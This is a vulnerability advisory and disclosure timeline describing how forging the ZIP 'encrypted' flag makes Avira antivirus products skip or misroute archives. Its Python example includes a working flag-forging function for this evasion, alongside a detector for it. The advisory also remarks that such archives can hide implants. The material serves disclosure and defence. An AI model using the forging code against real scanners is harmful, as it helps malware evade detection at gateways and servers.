________________________________________________________________________
From the low-hanging-fruit-department
AVIRA Generic Malformed Container bypass (ZIP GPFLAG)
________________________________________________________________________
Release mode : No Patch - Coordinated otherwise
Ref : [TZO-13-2020] - AVIRA Generic AV Bypass (ZIP GPFLAG)
Vendor : AVIRA
Status : Not Patched
CVE : none provided
Blog :
https://blog.zoller.lu/p/tzo-13-2020-avira-generic-av-bypass-zip.html
Vulnerability Disclosure Policy: https://caravelahq.com/b/policy/20949
Affected Products
=================
AV Engine below 8.3.54.138
All Avira products :
- Avira Antivirus Server
- Avira Antivirus for Endpoint
- Avira Antivirus for Small Business
- Avira Exchange Security (Gateway)
- Avira Internet Security Suite for Windows
- Avira Prime
- Avira Free Security Suite for Windows
- Cross Platform Anti-malware SDK
Attention:
Avira does not patch or update its very popular command line scanner,
which is still available for download on its website. Since Avira does
not release an advisory, its customers are none the wiser.
Avira licenses its engine to many OEM partners. The OEM partners that
use the Avira engine may or may not be vulnerable. I would advise that
you reach out to the vendors listed below to find out whether you are
affected. OEM partners can reach out to me to retrieve the POC in order
to test.
AVIRA OEM Partners:
- F-Secure
- Sophos
- Barracuda
- Alibaba Cloud Security
- Check Point
- CUJO AI
- TP-Link
- FujiSoft
- AWS
- Rohde and Schwarz
- Careerbuilder
- Huawei
- Dracoon
- Total Availability
- FixMeStick
- APPVISORY
- Tabidus
- Cyren
Source :
https://oem.avira.com/en/partnership/our-partners
I. Background
----------------------------
Quote: "We protect people—like you—across all devices, both directly and
via our OEM partnerships. We provide a wide variety of best-in-class
solutions to enhance your protection, performance,
and online privacy—ranging from antivirus to VPN and cleanup technologies.
Server security should get special attention, as a single employee
might store a malicious file on the network and instantly cause
cascading damage across the entire organization.
With Avira's solutions for server security you can prevent such
scenarios by protecting your network, data, and web traffic."
Avira also carries the Trust Seal of
http://www.teletrust.de/itsmig/
II. Description
----------------------------
The parsing engine supports the ZIP container format. By specifically
manipulating the general purpose bit flag (GPFLAG) in the ZIP archive,
the Avira parser can be made to believe the file is encrypted although
it isn't. This leads the endpoint products to ignore the archive, and
the Avira gateway products to follow the "file is encrypted" logic,
which by default blocks the attachment.
In my experience most companies ask employees to encrypt archives when
sending them via email. It is hence very likely that password-protected
ZIP files are allowed through the gateway. For these customers this
exploit bypasses the gateway by leading it into the wrong logic path,
believing the file is encrypted. 7-Zip extracts the file without
prompting for a password.
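As an added, self-contained example (not code from this advisory, from Avira or from 7-Zip), the following Python reproduces the manipulation described above and the check a gateway should perform instead of trusting the flag. The advisory does not say which bit is flipped; the example assumes it is bit 0 of the general purpose bit flag, the "encrypted" bit defined in PKWARE's APPNOTE, set in both the local and the central directory header. The sample archive content is constructed. Python's standard zipfile module stands in for the flag-trusting parser: it refuses the forged entry and asks for a password, while a check that ignores the flag, inflates the raw entry bytes and verifies them against the stored CRC-32 shows the entry is plain deflate data.

```python
import io
import struct
import zipfile
import zlib

# Bit 0 of the general purpose bit flag marks a ZIP entry as encrypted
# (PKWARE APPNOTE.TXT 4.4.4). Assumption: this is the bit the advisory
# calls "GPFLAG"; nothing else in the archive is changed.
GP_ENCRYPTED = 0x0001

# Constructed sample input: a harmless, compressible text entry.
SAMPLE_NAME = "report.txt"
SAMPLE_PAYLOAD = b"quarterly figures, nothing to see here\n" * 32


def build_archive(name: str, payload: bytes) -> bytes:
    """Write a normal, unencrypted, deflated single-entry ZIP into memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, payload)
    return buf.getvalue()


def _central_directory(data: bytes):
    """Yield (central_header_offset, local_header_offset) per entry."""
    eocd = data.rfind(b"PK\x05\x06")
    if eocd < 0:
        raise ValueError("no end-of-central-directory record")
    count, _cd_size, pos = struct.unpack_from("<HII", data, eocd + 10)
    for _ in range(count):
        if data[pos:pos + 4] != b"PK\x01\x02":
            raise ValueError("central directory corrupt")
        nlen, elen, clen = struct.unpack_from("<HHH", data, pos + 28)
        yield pos, struct.unpack_from("<I", data, pos + 42)[0]
        pos += 46 + nlen + elen + clen


def set_encrypted_flag(data: bytes) -> bytes:
    """Set the encrypted bit in the central (offset 8) and local (offset 6)
    header of every entry; the entry data itself is left untouched."""
    out = bytearray(data)
    for cd_off, local_off in _central_directory(data):
        for flag_off in (cd_off + 8, local_off + 6):
            flags = struct.unpack_from("<H", out, flag_off)[0]
            struct.pack_into("<H", out, flag_off, flags | GP_ENCRYPTED)
    return bytes(out)


def stdlib_treats_as_encrypted(data: bytes) -> bool:
    """zipfile trusts the flag like the parser in the advisory: it refuses
    the entry and asks for a password the data does not need."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        try:
            zf.read(zf.namelist()[0])
        except RuntimeError:  # "File ... is encrypted, password required"
            return True
    return False


def entry_report(data: bytes):
    """Ignore the flag and test its claim: inflate the raw entry bytes and
    compare with the CRC-32 in the central directory. Returns a list of
    (name, flag_says_encrypted, plaintext_recoverable). Real ZipCrypto
    (12-byte header prepended) or AES (method 99) entries cannot pass."""
    report = []
    for cd_off, local_off in _central_directory(data):
        flags, method = struct.unpack_from("<HH", data, cd_off + 8)
        crc, csize = struct.unpack_from("<II", data, cd_off + 16)
        nlen = struct.unpack_from("<H", data, cd_off + 28)[0]
        name = data[cd_off + 46:cd_off + 46 + nlen].decode("utf-8", "replace")
        lnlen, lelen = struct.unpack_from("<HH", data, local_off + 26)
        start = local_off + 30 + lnlen + lelen
        raw = data[start:start + csize]
        plain = None
        try:
            if method == 0:      # stored
                plain = raw
            elif method == 8:    # deflate: raw stream, no zlib header
                plain = zlib.decompress(raw, -15)
        except zlib.error:
            plain = None
        recoverable = plain is not None and zlib.crc32(plain) == crc
        report.append((name, bool(flags & GP_ENCRYPTED), recoverable))
    return report


def classify(data: bytes) -> str:
    """Verdict a gateway could act on instead of a blanket rule for the flag."""
    report = entry_report(data)
    if any(flagged and ok for _, flagged, ok in report):
        return "malformed: encrypted flag set but entry data is plaintext"
    if any(flagged for _, flagged, _ in report):
        return "encrypted"
    return "clean"


if __name__ == "__main__":
    clean = build_archive(SAMPLE_NAME, SAMPLE_PAYLOAD)
    forged = set_encrypted_flag(clean)
    for label, blob in (("clean", clean), ("forged", forged)):
        print(label, stdlib_treats_as_encrypted(blob), classify(blob))
```

A gateway applying classify() would route the forged file into its malformed-archive path rather than its password-protected path, which is where the "pass encrypted archives" rule lets it through. A genuinely encrypted entry still classifies as encrypted, because its bytes neither inflate nor match the stored CRC-32.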
Avira argues that "In this case our product reacts as planned and
defined in our product, we only support standard conform file types in
this case, if the file header shows an encrypted file, we will not try
to unpack it. Using a gateway protection without using an endpoint
protection cannot be taken into consideration as it violates commonly
known standards like the defense in depth strategy."
In my experience companies mix AV vendors to increase the detection
rate. It is quite common not to run Avira on the endpoint when it is
used on the gateway, and there is no guarantee that this endpoint would
detect the sample that bypassed Avira on the gateway.
Avira, however, does not believe so and assumes all customers also have
its endpoint solution installed.
I tried to explain the threat model by referring to their own website,
which claims that detection on servers is indeed very important
(original in German, translated here):
"Server security should therefore receive special attention: if only a
single employee stores a malicious file on the network, it can trigger a
fatal chain reaction throughout the entire company. With Avira's
solution for server security you can prevent such scenarios and protect
your network, your data and your internet traffic."
Odd discussions followed, with Avira arguing that "defence in depth" is
a default security strategy that customers should have; I am going to
spare you that discussion.
In summary: Avira has not patched this flaw (contrary to other vendors).
All client-side products (including servers) will ignore the archive
and not scan its contents. If you want Avira to focus on providing the
most coverage possible, feel free to reach out to them. If you are an
OEM partner I suggest you do the same.
III. Impact
----------------------------
Impact depends on how the product and engine are used within the
customer's organisation. Gateway products (email, HTTP proxy etc.) may
allow the file through unscanned and give it a clean bill of health.
Server-side AV software will not be able to discover any code or sample
contained within such an archive, and it will not raise suspicion even
if you know exactly what you are looking for (which is, for example,
great for hiding implants or an exfiltration/pivot server).
There is a lot more to be said about this bug class; rather than bore
you with it in this advisory, I refer to my 2009 blog post:
http://blog.zoller.lu/2009/04/case-for-av-bypassesevasions.html
IV. Patch / Advisory
----------------------------
I advise customers of scancl.exe (or the Unix variant) to change to
another vendor, as Avira apparently no longer maintains it and
apparently also does not warn customers about vulnerabilities.
Furthermore, should you be an enterprise customer of one of the OEM
partners above, I suggest you reach out to that vendor to understand
whether this flaw was patched downstream in their respective products.
I recommend that the amavisd project warn its users of these facts:
https://gitlab.com/amavis/amavis/blob/master/amavisd.conf
In case you have any further questions please direct them to Avira; the
above is based on the best of my knowledge, and since Avira does not
release advisories we are left in the dark as to what they officially
recommend.
V. Disclosure timeline
----------------------------
How Avira handled these reports in 2009:
https://blog.zoller.lu/2009/04/avira-antivir-generic-cab-bypass.html
The below is a summary of the 2-3 evasion reports that I have
submitted. See [TZO-001-2020] Avira for the overall coordination
timeline; here is the specific one.
04-12-2019
"From our point of view this is an attack with a very low probability.
Gateway does not check encrypted files.
In this case our product reacts as planned and defined in our product,
we only support standard conform file types in this case, if the file
header shows an encrypted file, we will not try to unpack it.
In the further process the above mentioned conditions must be taken into
consideration, which lowers the attack vector further.
Using a gateway protection without using an endpoint protection cannot
be taken into consideration as it violates commonly known standards like
the defense in depth strategy.
All in all I am sorry, but we will stay with our decision, which means
that we will not handle this as a vulnerability."
Editor's note: Avira is arguing on "probability", which is risk
management. That is fine for customers, but as Avira does not know the
context in which a customer uses the product, it cannot rate the risk
for thousands of enterprise customers. That is why vulnerability
coordination generally focuses on the technical aspects and does not go
into "probability" factors.
04-12-2019
- Avira closes the reports
05-12-2019
I reply with
"First you assume it is only 7zip; it isn't. I only use 7zip because it
is the most used in my experience within enterprises.
"if the file header shows an encrypted file" -> the archive is not encrypted.
You have not taken into account at all that your customers will need to
set the rule set to PASS on encrypted files, leaving this UNENCRYPTED
file unscanned. You could scan it but you choose not to, so this is
bypassing your GW protection logic - which you seem not to take into account.
You assume your customers have your endpoint solution installed, that is
not necessarily the case, actually I would argue the opposite, more
often than not. Regardless of the rationale above you already set it to
not applicable. As discussed and agreed beforehand I will hence proceed
to publish an advisory on the matter."
Quick addendum, on my "risk management" point: you are talking about
"probability"; the probability of occurrence is for your customers to
determine based on their use case and policy, during risk management.
The probability that someone will use this method is actually high. Why?
The cost of doing so (swapping a byte) is very low and the gain is high.
You made the wrong call; you should have changed your gateway logic and
patched the vuln.
05-12-2019
Aviras reply "As discussed and agreed you can move on with the
disclosure process.
We would kindly ask you for a quick note in the moment you publish the
article."
05-12-2019 I request a list of affected products " I'd need a list of
affected products from you. Any advice to customers on how to configure
the product or any other mitigations?"
05-12-2019
Avira: "can you please clarify the usage of both?
Would these answers be publicly disclosed"
Editor's note: Didn't we just agree, a few hours before, that I would
publish an advisory?
09-12-2019:
Avira replies, but does not provide a list of affected products.
The reply:
"Which software products are affected?
The feature of unpacking this highly manipulated and corrupted Zip file
is missing in all our consumer products, as our customers are protected
by the real time protection.
The Avira Exchange Security product will handle a mail with such a file
attached automatically in the "bad mail process", which is by default
assigned to send all tagged mails to an administrator, but can be
configured by the owner.
Mitigations/ Configuration advices:
For customers using our endpoint protection we recommend to not switch
off the real time protection, which is enabled by default."
09-12-2019
I wanted to make sure there was no misunderstanding, as a lot of
components effectively have no "on access" scanner capability (gateway,
cloud, server):
"Thanks a lot, after reading through this I have 2 comments:
Can you double check for Avira Exchange? That is not the case, it will
go into the "Encrypted file" logic and follow the rule set for
passworded files.
Have you considered your SMB range of products? Especially Server, any
further recommendations there? https://www.avira.com/de/server-security
- Quote (translated from German): "Protection for file servers. Protects
all data stored on your servers against malware.""
09-12-2019
I follow up:
"The problem is that it won't have the same workflow in 95% of the cases
as passworded files are mostly whitelisted. Which was my point in the
report.
Files on servers are often stored and not executed, real time protection
doesn't help a lot in this particular case."
09-12-2019
Avira replies:
to comment 1:
In this case it would mean, that an owner decided to differ from the
default and recommended configuration, which moves the layer of
protection from the gateway to the endpoint protection. Which leads us
to the point of "real time protection".
to comment 2:
So to be 100% accurate about that, we are talking about a manipulated
zip file, which is stored on a share drive in the local area network,
which I as a user can access and copy the file from to my local device?
OR We are talking about a manipulated zip file, which is stored in a
share drive in the local area network, which I can access and unzip my
file to? (So the share is not read only?)
09-12-2019
My reply:
"I have given presentations about this around 2011 - rarely is the same
AV solution used on the endpoint as on the gateway (reasons are
obvious: you are most likely to detect more). In a scenario where Avira
would have detected the sample but Symantec (endpoint) did not, you have
failed to protect the customer. In addition we are usually talking about
security goals of a product that fails or doesn't. Justifying that one
product fails but another one would catch it is muddying the water and
simply inconsistent. The security promises and goals are not true any
longer. You cannot rely on your customer having other mitigations,
that's also not what you promise customers of your GW product.
You use one example when there are hundreds. If I were an APT I
would store my stash inside such a zip file; since it can't be parsed it
won't be detected and will stay dormant, EVEN if detection routines
exist in the DLP/AV product.
Whatever the protocol is, SMB, FTP, HTTP, CIFS: the file is stored on a
server and processed remotely, automatically or by a user. That is the
reason we invest in server side AV. Which seems also to be the promise
made to customers.
(translated from German:) "Server security should therefore receive
special attention: if only a single employee stores a malicious file on
the network, it can trigger a fatal chain reaction throughout the entire
company. With Avira's solution for server security you can prevent such
scenarios and protect your network, your data and your internet traffic."
10-12-2019
taking all your arguments in consideration we decided, that we will not
investigate any further on this special case, as we do not accept your
argumentation regarding an increased attack vector or an increased risk.
The risk of this file is the same risk as of files being encrypted by
a password and storing the password in a text file next to the zipped file.
Regarding your comments we will stay with our argumentation, that a
security approach and the mitigation of risk should not be based on one
single layer of protection (Defense in Depth).
The following definition of this approach shows our argumentation in
more detail, which we would highly recommend to take into
consideration, especially if APT attacks are part of your personal
threat landscape.
Defense-in-Depth
"Information security strategy integrating people, technology, and
operations capabilities to establish variable barriers across multiple
layers and missions of the organization."
[Bill Bonney, Gary Hayslip, Matt Stamper: CISO Desk Reference Guide
Volume 2, 2018]
Quoting a white-paper published by the Department of Homeland
Security in September 2016:
"An organization's cybersecurity strategy should protect the assets that it
deems critical to successful operation. Unfortunately, there are no
shortcuts,
simple solutions, or "silver bullet" implementations to solve cybersecurity
vulnerabilities within critical infrastructure [...]. It requires a layered
approach known as Defense in Depth."
Department of Homeland Security, September 2016
We will close this ticket for now.
Thank you for contacting us and feel free to reach us with in case of
any further findings or reports.
10-12-2019
My reply:
With all due respect, I am not discussing security strategies I am
reporting vulnerabilities. I also don't think I need to be lectured on
these. You are running a product vulnerability coordination program not
an incident response program or risk management program in a company.
Per definition this is a vulnerability.
You have not understood the threat model and keep talking about "risks".
When I argue about Enterprise usage of your software you start to argue
that APT is not part of my "personal" threat landscape.
I am giving up on this one and will let your customers decide. I
understand you have no further recommendation for your enterprise
customers using your server side protection."
21-12-2019
I realise that I have still not received the list of affected products:
"You have not answered my request for the list of affected products. I
need a list of products that are affected if you want to respect our
previous agreement and continue collaboration."
21-12-2019
"I provided an answer to that in my post from the 09 Dec 2019 15:20:42 UTC."
Note: They didn't (see above)
22-12-2019
"You have not provided an answer - I need a list of products (Server,
Gateway, Client-side) that are unable to parse the archive.
You are talking about a gateway only."
No reply
13-02-2020
Release of this advisory.